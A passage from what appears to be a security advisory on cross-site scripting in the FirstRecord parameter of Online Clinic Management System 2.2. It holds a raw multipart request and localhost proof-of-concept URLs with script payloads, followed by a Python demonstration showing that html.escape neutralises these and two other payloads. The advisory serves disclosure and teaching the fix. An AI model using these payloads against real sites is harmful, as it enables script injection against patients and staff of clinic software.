form-data; name="SelectedID"<br /><br />1<br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="SelectedField"<br /><br /><br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="SortDirection"<br /><br /><br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="FirstRecord"<br /><br />"><script>alert(1);</script><br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="NoDV"<br /><br /><br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="PrintDV"<br /><br /><br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="DisplayRecords"<br /><br />all<br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="patient"<br /><br /><br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="SearchString"<br /><br /><br />-----------------------------1512016725878--<br /><br /><br />1. Description<br /><br />Online Clinic Management System 2.2 does not sufficiently encode<br />user-controlled input, resulting in a stored Cross-Site Scripting (XSS)<br />vulnerability via the FirstRecord parameter of /clinic/patients_view.php.<br /><br /><br />2. Proof of Concept<br /><br />http://127.0.0.1/clinic/patients_view.php?SelectedID=1&record-added-ok=11536&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=<br /><br /><br />The same FirstRecord parameter is also reflected without encoding in two further views.<br /># Vulnerability Type: Reflected Cross-Site Scripting<br /><br />1. Description<br /><br />Online Clinic Management System 2.2 does not sufficiently encode<br />user-controlled input, resulting in a reflected Cross-Site Scripting (XSS)<br />vulnerability via the FirstRecord parameter of /clinic/events_view.php.<br /><br /><br />2. Proof of Concept<br /><br />http://127.0.0.1/clinic/events_view.php?SelectedID=2&record-added-ok=7758&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=<br /><br /><br />1. Description<br /><br />Online Clinic Management System 2.2 does not sufficiently encode<br />user-controlled input, resulting in a reflected Cross-Site Scripting (XSS)<br />vulnerability via the FirstRecord parameter of /clinic/disease_symptoms_view.php.<br /><br /><br />2. Proof of Concept<br /><br />http://127.0.0.1/clinic/disease_symptoms_view.php?SelectedID=1&record-added-ok=1096&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=<br /><br /></code></pre>
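Three XSS findings on this page use three different payloads because the injected value lands in three different HTML contexts: GaanaGawaana echoes q as text inside <title>, so the payload closes the title first; the Kiddoware device name and the Online Clinic FirstRecord parameter land inside a double-quoted attribute, so those payloads open with "> to break out. The following added example (not code from any of the three applications) renders each payload into a template standing in for its context, once by plain substitution and once after html.escape(), and uses an HTML tokenizer to list the elements the payload managed to create. The templates are assumptions; in particular the dashboard context for the Kiddoware device name is inferred from the shape of the payload.

```python
# Added example, not code from GaanaGawaana, Kiddoware, or Online Clinic
# Management System: the three payloads from this page rendered into their
# contexts unencoded and encoded, with a tag scan showing the difference.
import html
from collections import Counter
from html.parser import HTMLParser
from typing import Callable, List


class TagCollector(HTMLParser):
    """Records every start tag a browser would create from the markup."""

    def __init__(self):
        super().__init__()
        self.tags: List[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup: str) -> List[str]:
    p = TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


# (payload from the write-up, assumed template); {v} marks where the value lands.
CASES = {
    # GaanaGawaana: q echoed as text between <title> tags
    "gaanagawaana_title": (
        "aw9rx</title><script>alert(1)</script>rg1m6",
        "<html><head><title>{v}'s Song Download, Listen & Lyrics</title></head></html>",
    ),
    # Kiddoware: device name shown in the parent dashboard (attribute context assumed)
    "kiddoware_device_name": (
        '"><img src=x onerror="alert(1)"/>',
        '<input type="text" name="deviceName" value="{v}">',
    ),
    # Online Clinic: FirstRecord echoed back into a hidden form field (assumed)
    "clinic_firstrecord": (
        '"><script>alert(1);</script>',
        '<input type="hidden" name="FirstRecord" value="{v}">',
    ),
}


def render_raw(template: str, value: str) -> str:
    """What the vulnerable pages do: substitute the value without encoding."""
    return template.replace("{v}", value)


def render_escaped(template: str, value: str) -> str:
    """html.escape(quote=True) encodes < > & " ' and therefore covers both
    text nodes and double-quoted attribute values. It is not enough for
    values placed inside <script> code or in a URL, which need their own rules."""
    return template.replace("{v}", html.escape(value, quote=True))


def injected_tags(template: str, value: str,
                  renderer: Callable[[str, str], str]) -> List[str]:
    """Elements present after rendering that the template itself does not contain."""
    before = Counter(tags_in(render_raw(template, "")))
    after = Counter(tags_in(renderer(template, value)))
    return sorted((after - before).elements())


if __name__ == "__main__":
    for name, (payload, template) in CASES.items():
        print(name, "raw:", injected_tags(template, payload, render_raw),
              "escaped:", injected_tags(template, payload, render_escaped))
```

The raw renderings yield a new script or img element in every case; the escaped renderings yield none, which is the whole fix for all three findings as long as the value stays in a text or quoted-attribute context.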